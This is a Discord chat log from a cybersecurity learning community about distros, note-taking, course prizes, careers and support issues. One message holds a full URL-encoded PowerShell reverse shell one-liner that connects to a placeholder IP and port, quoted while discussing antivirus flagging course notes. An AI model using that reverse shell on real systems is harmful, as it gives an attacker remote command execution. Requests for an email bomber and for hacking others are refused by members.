I use Kali in a VM for cybersecurity, so I don't need a cybersecurity focused distro as a host

Just something that isn't windows

Any distro should be fine

I use fedora, I've heard good things about pop os, some people like arch

Can someone help me with this question XSS attacks are more than just JavaScript code. You also need to know the basics of HTML.

If you recall from the recipe, HTML tags are used to create elments on a web page. Sometimes injecting harmless HTML can lead to discovering XSS vulnerabilities, especially when your payload is blocked by the server.

GOAL:
Inject an extra paragraph element.

@south inlet

Where is this from?

Class I'm taking

We can't help with classwork, sorry.

Try Mint

Ik this is a bit irrelevant, but does fedora boot slower compared to most distros

Boots pretty fast for me

Haven't noticed

ARCHLINUX BOOOOOOM

hello, can someone give me any good resources where i can read about vulnerabilities? also how those vulns were exploited. I've got some blog webs but they only talk about the vulnerability not how it was actually exploited.

and is there a way i could practice to exploit those on my own? Well, I'm not interested in web exploitation.

I mean if there was vulnerability found in an OS or any application and i wanna practice exploiting it and maybe write my own PoC.

You look at the research articles

Hey team! Happy thursday!

@twilit portal Kebab

Hello, have a question regarding my account. I previously created my first account with my student email, and made pretty good progress through some of the learning paths. TL;DR I was using a student account, but now my school has moved their email services to O365, and they removed my student email since i graduated in 2021, and I have lost access to this account.
Is there any way to get my data transferred over to my new account so I don't lose all of my progress?

Are you not able to login to TryHackMe?

Oh, I see, nvm. I don't think that's possible

@sturdy beacon I can't remember which channel you pinged me to ask about Reminna.

Done!

thank you: so kind of you for the follow-up
that was in #site-support when I experimented remmina with VNC to the AttackBox and I had that ugly effect: #site-support message
like in your GIF, I usually get good results with remmina and that button on the left for dynamic resolution update, in particular with THM Windows target machines
but not for this particular case of VNC and THM AttackBox

Gave +1 Rep to @south inlet (current: #1 - 2820)

I'll try the VNC in a minute.

Hello everyone, does someone remember where can I find the lessons on how images could be saved when uploaded in a web form? I studied it from the platform months ago but I forgot where to find it. Thx ❤️

Probably under the web fundamentals path

this is definitely a case where you have to email support

hello, want to know about, what kind of premium content that THM gives if subcribed as premium user? if its not bother, would like to know first if its really any special content included or being trend?

you can see, many of the rooms are available to premium users only. take the windows fundamentals for eg.
although i'd suggest to start from free resources (from yt) and when you're kinda intermediate, buy a subscription.

Learn hacking from yt?

i wont call it 'hacking' but youtube is one of the best places to get started.

https://github.com/rezaduty/cybersecurity-career-path

Is cybersecurity same thing as hacking

Like if i go study cybersecurity is there hacking

yep

Cybersecurity is when you protect the system by reporting security issues, which could be exploited to hack the system.

Oke

wont be all hacking

if youre talking about studying in college then it probably wont be much of it unless you look specifically to take those courses

will be a lot of information security and business related things

like security and risk analysis, networking

some colleges let students pick from a variety of courses however -- mine has ethical hacking, malware analysis, and digital forensics (which is their blue team stuff)

check the academic course path for your program and see how well it fits your interests

You guys learn hacking on colleges xD

Yeah?

I learned how to do it inside and outside of college

^^

Goes further than ctfs in college

Got help from support, but I ended up finding my old account password cached on my old browser. Thanks

Gave +1 Rep to @spark sun (current: #10 - 780)

#site-support

Wow! This room so easy I will complete it instantly 😂 😂

quiet-conversation when loud-conversation walks in 😲

Good morning

Should i go IT high school

It's already the Q4 of the year Stop waiting for the perfect moment to chase your dreams, create that moment today, Remember, small steps of every single day will lead to big, life-changing results. You’ve got everything it takes, now is the time to start and make it happen, you still have the last quarter of the year to make to achieve success. Like I also did! Let's go!!

What’s the Q4 of the year mean?

quarter 4

Bet

i.e split the year into 4 parts... and name them q1-q4

used very much inside business and for release dates

is anyone here?

No

No

Nope, that's why its quiet

Ye

Hello

Is there email bomber in kali linux

Depends. For what reason would you want an email bomber?

Oomm... For educational purposes only 👍

I wanna test it how it works and stuff like that

Uh huh. With what end goal?

Send friend very much email

Ah. Gotcha.
In that case @south inlet is the best person to answer 👍

Scary

Yo, why you want something like that for?

Why i want emailbomber?

Just want to see how it works and maybe test it to friends

But nothing bad

...That's not how it works.

That would be illegal, your friends don't own the email accounts

So its illegal to "email bomb" somebody even if you have their permit?

Like im new to this stuff i dont know

You'd need to get permission from whomever owns the email, for example Microsoft, Which I doubt you'd get

If you're unsure,.it's probably best you don't

Do u have email bomber

No, because I don't wish to have unethical/illegal tools...

What u think like i want to learn cyber security and ethical hacking and maybe build a career in it so whats the beat way to study and learn it

I'd suggest using TryHackMe.

Have a read over #start-here

Can I ask a question? Why does your mind connect email bombing and ethical hacking? Email bombing is just annoying and not ethical and not hacking neither.

Okay thank you

Gave +1 Rep to @south inlet (current: #1 - 2834)

Dunno

Alright, but keep that in mind, as Scrubz told you :)

(:

Does Discord use ur private or public IP in a vc for example?

I think you answered your own question.

Private IP addresses are not routable on the open internet

969

hi all,
i am getting 500 Something went wrong error when i am downloading the openvpn file from Access can someone help me out to resolve this issue?

How well do you guys think obtaining the Jr. Pentester Certificate through THM has prepared me for studying for the OCSP? 5%? 50%? Just curious how much harder the OSCP labs/course work will be compared to what THM Jr. Pentester path has taught me so far

Now idea how much, but OSCP is much harder

Jr. Pentester is enough for one to get started with doing standalone machines, recon, Enum and such stuff. I would rec. the "Offensive Pentesting" Path.

Trying the "AD Exploitation" module should much better for understanding of AD.

Other then Learning, you can do the standalone boxes on tryhackme for practice + go over the TJnull's "OSCP List" and try HTB boxes.

One cool thing you should do is, taking good notes and making your personal cheetsheet.

facts

i have half of my notes on paper and other half on a file 😭

care to explain what this means

Obsidian Notes.

You can link topics to each other, like moc.

does it have code formatting too ?

Markdown formatting.

💪

@snow gulch This isn't even mine lol, it's friends. Who takes very "Extensive" notes.

well tell him he's just like me

People

Looks like a round of Stellaris

Indeed it is.

deam that is impressive i m using logseq but i have problem with sorting it out like i have mess in my notes should spend more time orginizing i guess

It's not even mine lol.

it's friend's.

i m wondering is there a way to like share my notes between devices cos in my work i m using company laptop and during pentests i have some notes but on my main machine i have the other half and i have raspberry just laying aroud it should be able to run some file sharing or idk never done that but i dont want it in some 3rd party cloud

Depends on what Note Taking application you are using.

logseq on both company and mine machine and for mobile too

There should be something like that.

@misty obsidian hey, for pwncat-cs why didn't you use the setup with python poetry?
It's there in the docs, for the proper installation

wait

how do you know about that? @woven patrol

that was also my next step lol

h4xx0rs

I was once a contributor to that project and had an offer to become a maintainer🥲
Got mail from GitHub for your issue

You can also create a virtualenv to use it, and create an alias for it to to run via tha venv directly

Yeah I struggled with that too. The trouble is that Logseq is not letting you sync between devices. Because of their focus on security and privacy they store everything offline. I do believe they have a function in beta to sync if you contribute financially to the project. Besides that there is a work-around, but it’s a headache imo.

Thanks somehow I had a feeling that it won't be as easy as I thought

Gave +1 Rep to @sick pivot (current: #2256 - 1)

Haha yeah I tried it myself. It is possible, but Logsec is one of the applications that doesn't make it easy. Understandable given the fact that syncing between devices if there is no encryption in place is a security risk.

But if the syncing is important to you I'd suggest checking out Anytype, it's not exactly the same as Logseq or Obsidian, but it has some similarities and does allow syncing across devices.

well i prefer open source apps if i have an option but this seems interesting

Anytype is open source as far as I'm aware. I prefer open source apps too

Yeah me too, and very interesting

Hello what project going on

That’s cool, how are you doing today?

Does try hack me teach how to make malware

i would like to learn about botnets and how to stop scam call centers

There's room on Malaware Analysis but afaik there's no room on how to creating one

What kinda methods do you guys use to take notes? Like digitally. I want to get into the habit of taking notes while I do the tryhackme rooms but I always get overwhelmed or forget to take notes and I want to work on that

it depands but usually i just read the entire page once and then the second time i write down in my own words things that seem important to know

sometimes i copy entire paragraphs remove something to make it shorter cause when i want to go back and read the notes i dont want to read a whole page just find the one thing i wanted

the main thing is to just write what seems important to remember the notes dont have to be perfect so dont worry about it the most difficult thing is to start

Give Obsidian a try—it's a great tool for taking notes!

I mainly use Joplin, but Logseq is also really good depending on the note taking style you prefer

@novel mist @sick pivot thanks for your recommendations! Will check those out

Gave +1 Rep to @novel mist (current: #2259 - 1)

Hey guys. I believe it's my first time asking this question here. I been doing SOC Analyst Level 1 for a while now. As I progress further, the challenges get tricky. There was some times I couldn't find information I want when googling before restorting to walk ups. I wanted to gather your wisdom on how to search for results before resorting to walk ups. For instance, SNORT and SNORT The basics really made me bang my head as I couldn't figure out proper commands. How do you approach that you are not familiar with it and where to look despite using (commands) --help?

Hey y'all, I'm not sure if this is the right place to totally open up, but I joined here out of curiosity for general programming and Mr. Robot (😂).

I don't want to sound TV-brained, but would these learning tools potentially help to learn more about some harassment I've been receiving over the past couple of months? Nothing like precision tracking of this person, but rather some insight on who it may be, so I can not be so anxious all the time lol.

If you're being harassed, contact the relevant authorities in your region. US would be FBI or one of the few Cyber Joint Task Forces.

Unfortunately, I'm in Canada and these sorts of cases don't get much traction. To be fair, I haven't received anything really which leads me to believe I'll be harmed anytime soon (except for some vague "bad things will happen" text lol.)

I appreciate the response.

Funny I'm in Canada and went thru the same

I create scenarios within my notes, write them as a script

e.g.
use this command for :
[recommended command by thm or blog]

but this command worked for me:
[command I used]

or just leave the command recommended if that worked for you.

bookmark some blog that helped you thru, put it on the notes just in case

guys is anyone here good with Spark ada

I don’t get when people say “these sorts of cases don’t get traction” how do you know your specific situation won’t get traction? You don’t. Still contact the authorities, don’t compare other situations to your own.

Especially if you feel your life is being threatened, that heightens your case ten fold

Use chatgpt

What kind of harassment

That is precisely what I started doing. I had to start bookmarking on how I got the answer on my own because sometimes the walkthrough didn't work for me (I know sometimes they update rooms) still it wouldn't work as instructions on both tryhackme or walkthrough is unclear so I had to research and find commands that would produce answer.

That would be considered "cheating" But I get your point.

After you finish one room, you can always redoit right there or the next day, with the notes, links whatever, you took.

Great.

That's the problem, I don't believe it's life threatening to begin with, but who knows. You're right though, I guess I don't know what I don't know. I'm back to getting what I assume is random text now numbers, so it's worth a try I guess.

I guess the usual stuff? Texts from unrecognizable numbers, calls with no Caller ID, fake emails, social media DMs (when I still had them active)

What prosent(%) of rooms is usable with free thm

About 70%

It's closer to 60 now.

😢

https://tenor.com/view/glasses-finger-pushing-glasses-nerd-dweeb-gif-8613697

Who plays COD HERE?

Used to

Do you still have the logins to your account 😪

Yes

👀

finally got lvl up ngl seeing that number go up kinda keeps me going

.

Can I learn ethical hacking in lenovo ideapad 300?

Sorry 330.

Of course , good thing to start with 🙂

hey guys what after i finish the road map i already bought premium

which roadmap\

play ctf ?

THM has a couple of learning paths you can do. A recommendation on the order of completing those can be found here - #general message

I use both notion and obsidian and I can say both are great but notion is better. You can access your notes online

Cherrytree is great until your notebook reaches a certain size

Mine started crashing at about 40MiB.
It's also a pain in the backside to export from.

Obsidian is great until you start taking notes on windows exploitation and store them on Windows. Then they start to disappear quite quickly. Disadvantages of storing your stuff in plaintext. Just ask @remote echo

Notion is great until the company decides they don't like your notes and cut your access... just ask @tribal heart

ftw

My windows defender quarantines my "What The Shell?" notes because of this powershell command:
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

its in notepad.

says its a Trojan:PowerShell/ReverseShell.HNAA!MTB

Yeah, it'll do the same with Obsidian. Joys of storing your notes in plaintext

My computer is full can I move my Kali on my USB drive ?

Well they didnt cut my access... the waf just didnt like me kek. A little chat fixed it. But it would happen again. Instead I trilium

Not a good idea to take notes on exploit development in other ppls websites anyways

Classic

that's why i moved to joplin

You made me click the emote to see wtf it was, now I'm upset

I was enrolled at WGU, but I quit. Now I’m wondering what else I can do to break into the CS field. Honestly, I feel like I lack the mental fortitude for self-study, and constantly starting and stopping has me thinking about leaving it all behind.

can anyone help me with that junior security analyst intro answer?

What will be your role as a Junior Security Analyst?

triage specialist

Is a virtual machine and home lab the same ?

home lab is usually multiple virtual machines simulating a network. Like a windows server VM as a domain controller / DHCP / DNS and another windows server as a file server (shares and storage...) 2 other windows OS as clients.

This helps to practice pentesting a network. Getting access to a client > pivoting to the other client > getting access to the file server > and eventually getting access to the domain controller.

I wanted to check if you have conducted security testing on macOS 15. If so, I would greatly appreciate your insights or any help you can provide from a security perspective. It would be helpful to understand any potential vulnerabilities or key areas to focus on

Cybersecurity is a huge field with a lot of different types of problems. If you find one that keeps you curious and wanting to learn more, you can find a way. If you find yourself losing interest and not wanting to put in the effort even after taking a break, maybe you should think if it is the best field for you. In the end only you can tell and make that decision for yourself. But personally, curiosity is what kept me going, and why I keep going for more.

It is perfectly valid to also see it as a hobby and not a career path. Lots of ppl also do it like that. There is no "one size fits all", we are human, and your experience may vary.

had a question about ccna examination, do you need to have actual hands on experience with trouble shooting stuff and working with hardware or just theory knowledge is enough to crack it?

You have labs on the exam but you can practice with packet tracer

Any Help?

ohhh, guess i should get started with it.
Thanks for clarifying!

Gave +1 Rep to @weary meteor (current: #212 - 30)

Oh so you would need multiple computers for a home lab ?

Or do you switch between vms on 1 computer

not computers. VMs. If you have a monster PC with 64 GB of RAM and 2 TB of storage you can install multiple VMs on it.

Oh wow

I mean it's still possible to work with 32 GB. even with 16 GB but you're gonna have a painful time having all of those VMs on at the same time.
As a beginner 1 attacker machine for example kali linux, 1 windows server and 1 windows client is enough. This can be done with 16 GB ram as well.

hi, is anybody able to help me with making requests? bit lost here

you mean http-requests?

yeaa

what is the problem?

uhm im not sure what the id parameters mean like the key and value thingies

so i cant get the answers for 2 4 and 5 /:

parameters are what you see in the url:
www[.]blabla[.]com/index.php?parameter=value

which room is this?

right but when u launch the simulator thingy it gives u like a configuration button

http in detail

and which task?

task 7, the very last one

for question 2:

the parameter is called idand the value is 1
click on the save icon and then go

does that mean i dont put anything where it says "key"?

it still gave me a 404

🫡

to set parameters in the task you only need to click the gear in the top right

oh i see, thanks sm!

the key is the parameter.

#room-help is the channel for this.

hey guys; i love the new tryhackme web design 🔥

it is lowkey very clean

is there a discord channel for windows based programming
using powershell x .bat (batch) x VBS x js x anything else that can be executed natively on windows
not restricted to using devcon and the useless dependencies
when you can program it the native way

I want to release in the future a certain windows bug patch related to windows behaving as if the computer no longer has a wifi adapter, and even disabling the ethernet adapter, this bug often occurs when the user uses hibernate, this bug has appeared from 2020-2021-2022 I've reported the bug to windows many times but they didn't even bother to read it or even react to it (when this bug occurs users often reset their computer reinstalling windows or even go as far as to switch to linux or other OS)

I happened to discover a valid remediation this year, all theses years I struggled with this bug unable to use wifi and relying on ethernet that often gets disconnected as well, thankfully ethernet can be easily reestablished, I didn't want to switch to linux or other OS because I simply didn't feel comfort but when using windows

months ago, I decided to write the patch as an automation, since manually doing a remediation is really annoying and a waste of a time for a programmer

I haven't completed writing the final patch
but the current patch I wrote using devcon solves the problem

however devcon seems like a hassle since an alpha user isn't supposed to install external dependencies when a simple problem can be solved natively

Recently I found out I can just write it fully in PowerShell which is better
since the simple user won't have to install any dependencies and would solve the problem immediately

I still haven't wrote the code in a full automated way that can be released as an official release, so right now it's still as instructions
even after completing the full automation, I want to make sure I'm doing things right

if yes how do i unlock it? which freemium challenges I need to conquer ?

so the main problem is that during hibernation the wifi adapter stops working?

it's just refreshing

what does TBL stand for?

can someone help me

is it not tabletop?

In which context ?

cyber

Threat Behavior Library ?

Triple Bottom Line ?

.

I love pineapple juice with mayo

kewpie mayo or regular mayo though?

Does anyone know how to fix the input lag in VMWare? I tried multiple solutions. One temporarily worked, others none.
Tell me the ones you know. I'll try it if I already haven't.

Indicate what you’ve tried in your msg too so that others know.

can anyone help me learning pentration testing

Have a look at #start-here

Try HackMe also has a new ongoing promotion for people wanting to learn Cyber. Have a look at #announcements message.

Looking for mates to skilled together on THM. I am up with basics but not pro or great.
Anyone up for this?

yes same let's add each other friend and compete

Yes

https://medium.com/@matterpreter/cve-2023-28072-local-privilege-escalation-in-alienware-command-center-a836607762ba interesting cve writeup i found

I started studying cybersecurity a little through tryhackme, in one of the rooms about research tools, I decided to open my Google and do a password search using the search parameters I learned, having just found a file with admin passwords for a website , other than site management gmail passwords, the question is, is this as far as I can go without breaking any laws? Or can I log into the website and email as admin because the passwords were relatively public on the internet?

Might depend on where you live, but I guess you already answered that to yourself

There are discussions on the legalities of OSINT but short answer is no, you cannot login to the website.

That can be attributed as cybercrime or computer misuse by law as you do not have proper authorization on it.

My perspective is: OSINT is legal but you shouldn’t do it unless you have explicit permission, have a written contract or ROE in place.

Is it me or I'm noticing the patterns of each room comes with specific vms. Like I was just coming out of Zeek and I realized that it doesn't even have basic stuff like mouse which I had to use Nano just to make it easier to read the columns name instead of Cat which makes it bit difficult to read. Is that the purpose? To force you use cli all the time?

Was the machine CLI only?

Vms are probably reused as well, or at least base vms

I wouldnt say CLI only. Only because there was no other usable program like Text Editor or cannot use Gedit. So had to use nano or vi

iirc, the Zeek rooms used a Linux VM with Zeek already installed, and it was using the zeek-cut command a bunch to output the specific field-value pairs you wanted

Hi here 🙂 ,
idk where to ask: is there any new room planned for this week ?
(i know there is 20+ rooms with cyber101)
i'm just asking, i already miss the new challenges fever

hi can anyone help me pls with this q in the new path in thm in cryptography
Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?

ICANENCRYPT

don't post answers please
(also he has solved it already but that's not your fault for not seeing since it was in another channel)

oh sorry i didnt notice the thm abbreviation

(i was too excited to use the bruteforced i coded)

https://dcode.fr has lots of different ciphers and a cipher detection tool

I know you already solved it but for future reference

maybe through bolack loop?

black*

Can i be fully anonymous by using proxy chains and tor

Why you need to be fully anonymous?

Im still learning i only need to know that is it ok to be like that

are all prizes of cyber101 got claimed?

I suggest playing around in a controlled or lab environment woulld be ideal while you are learning. It isn't a good idea to try stuff on assets or resources owned by other people especially if you don't have consent.

What do you mean? There are prizes that are unlimited (Cyber Crusader title and streak freezes) and there are prizes that do (e.g., defcon, laptop, shirts, caps, etc.)

Which ones are unlimited?

https://tryhackme.com/r/room/trywinme

I’ve been actively completing rooms—more than four in a single day—while studying, but I've noticed an issue with redeeming my tickets. After finishing each room, I receive only a 7-day streak freeze, a 1-day streak, or new badges.

Initially, I received various tickets, but now I hardly get any. Could you please help me understand why I'm not receiving the tickets

Are the rooms you are working on included still in the CyberSecurity 101 path?

Yes
Enrolled In Cyber Security 101

Experiencing with ticket redemption. I've already redeemed my tickets and claimed my prizes, but Why ?

Have you checked whether the tickets go into the Tickets tab within your account or profile?

Yes, I’ve checked, and I can confirm that I’ve already redeemed the tickets. However, they continue to appear repeatedly, even though they shouldn’t. It seems like a glitch in the system.

because the rewards are over

its first come first get

Oh OK.
I was so close to claiming required only one ticket to get the reward.

But on the same side my friend also reciving the tickets like Laptop.

Does anyone get any voucher after completion of cybersecurity 101 path?

stop spamming all channels with the question, ask at least in the event channel. thanks.

Gave +1 Rep to @earnest tide (current: #2328 - 1)

Same here got 2 tickets of everything but never got the 3rd one

what is everyone up to, today/this evening?

programing

from the way the event seems to be constructed the first 2 tickets are randomly given away and have infinite supply whilst the third ticket for any given event are limited and have likley run out now.

Prograstinate 😄 😄

and you?

Same really, just waiting until my partner goes to work before I do anything lol

😄 why not now anything 😄

Been in a 3 hour convo about our wedding with my partner lol

I'm now tired so I will probably continue watching castlevania on netflix

Ahh okey 😄 Planning a marriage is supposed to be quite stressful. I hear

have fun.

We have it planned, got the venue booked and everything lol

planning is the most stressfull thing about the weeding or isn't? Way to mush decision to make 😄

It is, which is why we decided on a small wedding.

Not bad either. If you have families where this is possible, that's good 😄

We don't we have to hire witnesses lol 😆

If you and your partner have a family with 200 members then we'll talk about the witnesses 😄 If you even not inviting the child they get pissed on you 😄 😄

Hi??

I m doing rooms but why I only getting cyber crusader, 1 week freeze & 7 day freeze?

the greater the prize, the less probability

yrr please help me
in the room : Windows Fundamentals 1
I am unable to get the answers for task 6 of questions 2 and 4, please provide me both answers.

#room-help

actually that questions are about target machine so we can't find them on google

https://tryhackme.com/r/room/windowsfundamentals1xbx

Ask your questions in #room-help

but like I am only getting these 3

Anybody here to talk about codes?

what kind of?

virus codes

nope sorry

thanks

Everybody's getting same.

Malware is an advanced channel topic

i am getting these also

But HOPE

Ohh 🥺

Don’t let it get you down!

I got 10 euro swag voucher but the shipping charge to my country is 10 euro🥲

okkk

Yoo

Can anyone help me i need work experience in cyber security

For Y10

maybe this exists- but i would like to have an easy way to filter every CTF i should be able to RESOLVE by knowing every Room i have done! Not by level
FOr example . If i have done Intro to Cybersecurity and cybersecurity 101 , i should be in a level to finishes this... rooms!

Question is vague but you do have the 'hide copmpleted' filter in the search option when searching for rooms. And when you mavigate to learning paths you can see the ones you've already completed even when they are a part of a more advanced/intermediate learning path. - as long as you don't reset your progress on each individual room you've completed

After a second read - you'd best review the learning paths. Before there were roadmaps for which room to tackle next as github repos. But I think THM team have put a lot of effort in their learning paths and modules to classify and grade learning topics.

Because there are a vast of topics on infosec. Some with more depth and context than others.
All the while the rooms themselves may require prerequisite knowledge on a couple of domains like - recon, privesc & vuln chain to get to the final flag.

There is no straightforward path to guide your every single step. And that's the beauty of it - you draw your own footpath.

Hello, is this the right place to report some bugs? In the room Blaster the second last question (Task 4) is deprecated by metasploit and can't be solved if there is no proficiency with the framework. Also in the first answer of Task 3 the information can't be accessed. I know the answer is in the Suggestion box but in the rdp machine the answer couldn't be found. Thx

I shall refer you to the #room-bugs =D

Hi there, room bugs are posted in #room-bugs

I undestand... but there are soo many CTF and extra rooms that sometimes you dont know if you have done anything refered to that, so i was just pointing out that it would be great to se like related CTF .

Can you please leave these sort of things to mods

Sorry I didn't know that was a mod question, sure thing

Thanks i haven't seen it !!

can someone recommend a good website to boy a vps to host a linux machine

I want to have a command that can be accesed from everywhere

What will you be using the linux machine for?

Hacking, bug bounty, ctfs

I like to use interserver, just that's just my random personal preference haha. I rent a bare metal server from them and use that to host all kinds of things, including tools for security testing

DigitalOcean is all round the best imo

You can get free credits with Google cloud and azure. Oracle offer a 24GB RAM VPS always free but you do need to make a paid account.

I use a combination of Oracle with contaboo just because the prices are so damn good (£9 a month, VPS2 one)

Contabo or Hetzner are by far one of the best bangs for the money. Huge resources for cheap.

I use Linode, its good and I think they support bug bounty hunting too

Hetzner has a rigorous identification process and I believe they don't like their cloud being used for bug bounty hunting that's why they can take down your account with no say.

Weird. It took me 30 seconds to get signed up

Yep but they also requires additional KYC which then they can outright ban people befor being able to use the platform.

All I want for Christmas is DuPont Tychem 10000 Level A Suit

you need a real chemical protection suit for christmas

https://tenor.com/view/safety-suit-germ-free-dance-go-away-hazmat-suit-gif-16583533

in what possible scenario did they put you in one of the best chemical resistant suits

huge lore drop

I still don't see how chem protection suit would benefit that role

It is a good suit

better safe than comfortable

have anyone want to make a team to play CTF every weekend?

I started presecurity road. now I completed linux fundamentals. And I want know . Should I go these (bash and regular expressions ) before WIndows fundamentals?

Yes, regex is used everywhere you should definitely check it out 🙂

It also has its use on Windows OS

hey! few days ago I saw the winme event accidentally on the announcements, and thought it'd be fun to participate specially that the fall's weather makes life a bit depressive! and so I was having fun finishing room after room, that all of a sudden my account got reset or something!
the website is asking me to verify my email account, which I no longer have access to :/
but the rest of my account data is verifiable! I was having fun 😦
now I don't seem to even be able to enter any room!

I want my account back

Contact support

support@tryhackme.com

with another email address?

or do they have a phone line?
cause I posted in here hoping to catch the attention of the support team!

You need to email support, they do not have a phone line as far as I'm aware, and support requests are not handled in the discord. Send an email using the address associated with your account. Support is very busy, so it will more than likely be a couple of days before you get a response. Remember, if you send a bunch of emails, your request will be moved to the back of the pile. It's how the ticketing system works.

which rooms can I do after pre security ( CTF or attack machine)

Friday challenge coming?

is there anyway to make my kali linux thats running in a virtual box less laggy?

That would depend on the resources you allocated to it and the resources available on your host.

Its tricky as some of the challenge rooms require a combination of concepts to do or complete.

I would start at looking at Easy-rated boxes, but then again, it would depend on what concept has been included in a particular box.

gonna go a bit bananas and wipe windows off my stationary and install Arch Linux

thanks for the heads up on not sending too many🥃

I had a tough day, so just permitted myself to nag it away, here! but it never takes that long until I'm reminded of "oh wait a minute, I've been an adult for years now!"

Gave +1 Rep to @tawdry dove (current: #17 - 469)

yay guru

hello

UwU

Hello fellas

is it possible to earn money hacking legally making my own flexible hours?

i suppose it's a dumb question cause (almost) everything now a days we can work remotely but i don't seek much a career, more to enjoy and earn aswell

if yes, how sow?

Bug bounty or security research

When you say security researcher what do you mean specifically and in what kind of setting?

Again, might seem like a stupid question but half of the machine learning and data scientists I know are all in reality a multipurpose coder, gofer, and general "how do we do this" guys wherever they find consistent work

And they're not exactly happy about it.

Same with cybersecurity

it is a start

tks, but sirholkms has a point.

One example off the top of my head is security research on AV / EDR evasion using novel techniques. People do research and create proof of concepts and then pack it in such a way that its usable commercially.

Another can be security research and hunting 0-days on widely used products. Pwn2Own is an example of that kind of event.

Thanks for the clarification

Gave +1 Rep to @fathom panther (current: #20 - 428)

They should yell at their buiness managers for not understanding how to correclty apply their domains - and security teams really ought to be single-purpose. They should not be managing any system that isn't owned by them.

that's such a niche role to do independently. I would hazard that there are less than 1000 people worldwide doing security research in that way as a profession and not a side-gig/hobby

I believe hibernation may not be the solid trigger, as windows is very much flawed by default the way windows mechanisms can self-conflict with ease
However, the laptops in which hibernate was activated upon, manifested said bug
This might not only affect windows 10, but it was mostly manifested in windows 10;
there's a slight chance this might occur in windows 8 due to similarities of mechanisms with windows 10, but currently i have no data to support that, so we assume it's a windows 10 bug unless proven otherwise

hibernation might trigger that
but this might get triggered without the user using hibernate as windows employs hibernate at certain circumstances automatically

which means by default using windows 10 with enough time, your computer will enter through hibernation even if you didn't trigger hibernate yourself, this depends on your battery settings and windows choosing to go through hibernate automatically under certain conditions

even using regular shutdown or restart doesn't solve the problem
the bug is way deeper than that
it's self-induced through windows mechanisms
the updates cannot deal with a "non existant" problem
windows won't fix those things unless a higher-up speaks up about it, it isn't considered a bug by windows since they don't even know about it
Even though that this bug was reported many times several years ago and no one cared, not even a reply or comment
I'm pretty sure I'm not the only one who reported this issue, I've met with people who had experienced the same level, and some of them because of that no longer use windows

( I didn't 100% proofread my text, so please don't mind my textual errors )

Even google isn't efficient at solving similar problems
they make the so called "top-conductors" who might not even qualify to fix said bugs same thing for windows
the same "top-grass" would dismiss core bugs and even label it as "chit-chat"
as this really happened to me years ago when i reported a core bug related to google translate to google, even though there was no possibility for me to report non-security bugs,
I managed to engineer entry to make a google "top-grass" to acknowledge my bug, after contacting a higher up google employee who gave me the privilège to report my bug directly to a "top-grass", yet said "top-grass" dismissed the core-bug, as they couldn't even understand the problem, even though i made it clearly illustrated with details, and they classify it as "chit-chat" and marked it as the equivalent of complete
while the core-bug was fixed maybe a year or even later after google testers found out about it

Companies only care about security bugs, since it can damage them financially
windows isn't aware of the bug or that it might damage its reputation and money, so that's why they won't cope with those issues

i used windows 8.1, hibernation turned my wifi adapter off as well

also honestly just switch to linux

nah linux i tried it

linux is pretty cool for coding
and maybe IT and just that

windows is even better in terms of visuals & softwares
can't wine them all

linux will make your machine way fast compared to windows

and for gaming, linux is still lacking

simply watching videos on linux feels a bit weird since the image isn't portrayed as good as windows

you can always VM everything and test-drive them all

for tryhackme & folks you'd need to use a linux based OS and maybe kali

also for malware dev or analysis windows feels really fresh

windows works around money ( security updates always updated ) , but it's way too dysfunctional
( non-security bugs are way dismissed )
that disorder can be used against windows
< which makes exploring windows to me more fun >
I haven't reversed windows but many have done that

i can fix her

literally i can fix her

( referring to the windows dilemma )

I'm not gonna leave windows
i will fix the bugs
and will make windows better for everyone

Kali would not be a great OS to daily drive.

U could daily drive parrot, or just install hacking tools on a daily drive focused distro

VMing is the way ?

For Kali, yes.

Anything else? Self preference

i agree with that$

Can anyone help me prize redemption on tickets " I have won the $20 swag voucher and redeemed it" now how to use it . !!

You should receive an email with more details

about swag voucher also ??

Yes, you will receive an email 🙂

thanks. Got the mail

Did anyone get 3 laptop tickets yet??

i am curious , who are the winner of defcon tickets !!

Not finished yet, still got tomorrow to go.

I get 3 defcon33 tickets

Which means i won the ticket for the event

??

You need to redeem it, I think you do this by sending an email to tickets@tryhackme.com

Is it normal that the order discount code I received in my email doesn't cover 100% of the purchase?

As far as I know, you can have win 10$ and 20$ discounts. If you want to order more than that , it's on you

You can also win a free baseball cap, that's what I'm talking about here

If you win the cap, then the cap is free

That's what I'm wondering. They sent a code to use at checkout to get the free cap, which I've applied, but it doesn't cover all of the price 😂 cap costs CAD29.47 and the discount removes CAD27.63. I was wondering here if that's normal or if I'm doing something wrong here

Are you maybe selecting the tshirt coupon instead?

I don't think so, I'm copy pasting this code (not displayed)

Guys why do they want my discord passowrd?

thats sketchy idk why i did that

How does it work with the big prizes where you're supposed to email in to claim the reward? Are 100's of people winning and they are then chosen at random from all the emails? Or is it just a select few who are actually getting 3 of a kind for the prizes?

Who?

the server

made me log in using my dicord passowrd

any recomendations on how to learn how to hack like other peoples computers

which server?

@south inlet they might know.

Kinda sus

@south inlet told me that it was lligal 😦

Depends if you’re doing it illegally without permission.

any experts or more experienced leveled pentesters or soc freelancer would aknowledge if I follow step by step o THM paths it will lead me being a good hacker?

I think you will have a solid base to build on!

Once finished the path is it possible to applyvfor entry cybersecurity job as Soc analyst for example?

Soc analyst i am sure, i just have a bad feeling or underestimate myself when the subject is pen testing or bug bounty

It depends.. on my country I still need at least a degree in IT and this paths are put only as hobby's. Some emplyer take a look but others not.. better check the prerequisite in your local area.

